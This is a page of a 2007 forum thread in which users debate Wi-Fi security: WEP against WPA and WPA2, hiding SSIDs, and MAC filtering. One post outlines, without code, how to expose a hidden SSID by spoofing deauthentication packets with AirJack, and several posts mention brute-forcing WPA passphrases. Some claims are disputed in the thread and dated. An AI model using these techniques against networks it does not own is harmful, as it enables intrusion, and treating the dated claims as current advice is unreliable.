Main > Everything Else

Wi-Fi penetration made pant-soilingly easy

<< < (4/6) > >>

patrickl:

--- Quote from: ChadTower link=topic=62998.msg627493#msg627493 --- Patrick, while you'r'e right about a lot of that, what it doesn't address is that most of the most common places to sit and scan for openings are free wifi spots.  Starbucks, restaurants, hell the local McDonald's has wifi now.  Who that works at McDonald's is going to manage security and explain it to your average McDonald's customer when they bring in their ancient laptop and can't get on the net?  The only logistic way to handle that without hiring an expensive admin/support person is to keep it wide open.  That makes it the perfect place for someone with bad intentions... guaranteed wide open access point and anyone there is probably also wide open.

--- End quote ---
Entirely true. I was just reacting to your claim that even if you protect your access point that the network is still wide open. Apart from idiots bringing in new open access points (ad hoc or infrastructure) of course.

Indeed people using an open WiFi hotspot better make sure they have some other form of protection if they want to keep their information private (firewall/VPN/Virus scanner/etc). Or just hope that no one is listening/hacking.

Indeed if their computer gets hacked then anything can happen when they come back in your secure environment. But then a computer can also get hacked from using a malicious website (WLAN or cabled) So you need to protect every computer going on line anyway.

It's illegal to break in BTW (even on a open connection). Last year a guy in the US was arrested for using his neighbours internet connection. But still that doesn't mean you should leave your door open.

You shouldn't really use WiFi with anything less than WPA encryption. WEP can be hacked in minutes (if there is enough traffic) and an open connection is like an open door so anyone can come in. Setting up WPA is hardly more difficult than using WEP and only slightly more work than leaving it all open.

The following steps will easily protect a WLAN:
- Put a password on the Access Point (on the administration interface)
- Change the name (SSID) of your network in the accesspoint and make sure itīs not broadcasted
- Use WPA encryption (or at the very least WEP if you must use some old devices that canīt use WPA, but do realize WEP can be hacked)

Disabling SSID broadcast (your network will stop screaming out it's name to the whole world) is a nuisance, but I think itīs a big step. It prevents your network from showing up in a WLAN scan. So you have to type in the name yourself rather than have Windows autodetect it (which obviously makes it a bit more work to set up, but hardly a lot). Active scanning software only sees the broadcasted SSID's so that's the biggest percentage of hackers that are gone with one simple step.

The WPA encryption deals with the passive scanners.

Personally I don't bother with a MAC-address filter. It can be hacked anyway and it's a huge nuisance, but of course if you feel like it use that too.

Strokemouth:
You're half right on the WPA stuff. WPA-PSK (TKIP) is just as easy to crack as WEP as it uses the same RC4 encryption. In fact, WPA-PSK (TKIP) is easier to crack as you only need to gather one small set of data from one person joining the network. The advent of WPA2 makes it a little tougher now since you can choose to use AES over RC4, but you are still only limited by how complex the password is. Since WPA can use a simple passphrase, chances are they are pretty easy brute force. WPA Enterprise is a different story, but I doubt you'll see many places in your neighborhood that have their wireless hooked up to a RADIUS server using WPA w/ 802.1x, etc.

Even disabling SSID broadcast doesn't REALLY protect you. It is VERY easy to get the SSID of an AP that is not set to broadcast. You can use something like AirJack to spoof a deauthenticate packet to the client, forcing them to re-establish a session and causing the SSID to be sent plain text again or just use one of the many sniffers that look in places other than the beacon packet for the SSID (which, again, is sent plain text).

The best way to stay secure wirelessly is to use a layered approach. Turning off broadcast is a start. Use WPA2 (AES). MAC filtering does help, too. The logic is not that one of these measures will prevent all attacks, but that there will be enough hurdles in the way to make a possible attacker double-think whether or not it is worth their time.

ChadTower:

Or, turn it off when you're not actually using it.   :)

patrickl:

--- Quote from: Strokemouth on February 11, 2007, 08:50:19 pm ---You're half right on the WPA stuff. WPA-PSK (TKIP) is just as easy to crack as WEP as it uses the same RC4 encryption.

--- End quote ---
Well the thing is that with WPA (using TKIP) the key changes so the hacker doesn't get the chance to collect enough data to actually crack the encryption. Of course, the newer version of WPA you use the better, but even the basic form of WPA is a lot harder to hack than WEP. The only way to do it (in a WPA-PSK network) is with a dictionary or brute force attack and that can take a very long time. Depending on your password it will take days to centuries before it gets hacked.

It's substantially harder (more time consuming) to crack even the simplest form of WPA than it is to crack WEP. Of course you should select a secure password, but that goes for every password you use.


--- Quote ---The best way to stay secure wirelessly is to use a layered approach.
--- End quote ---
Maybe you missed that, but that's what I said too. I didn't suggest either of the steps as a separate method of securing the network.

:edit: Forgot to ask, but what reason do you have for using MAC-address filtering? Just as an extra layer? I always thought that a hacker, who is already able to sniff and decrypt WPA, will have no trouble getting the MAC-address out of the frames and spoof it. It's the last hurdle a hacker faces and by then I doubt it will stop him, so that's why I don't bother with it.

ChadTower:

A lot of the "hackers" I've talked to were just script kiddies that didn't understand what the crap they downloaded was doing... so any potential hurdle could be an entry killer, one more is just that much better.

Navigation

[0] Message Index

[#] Next page

[*] Previous page

Go to full version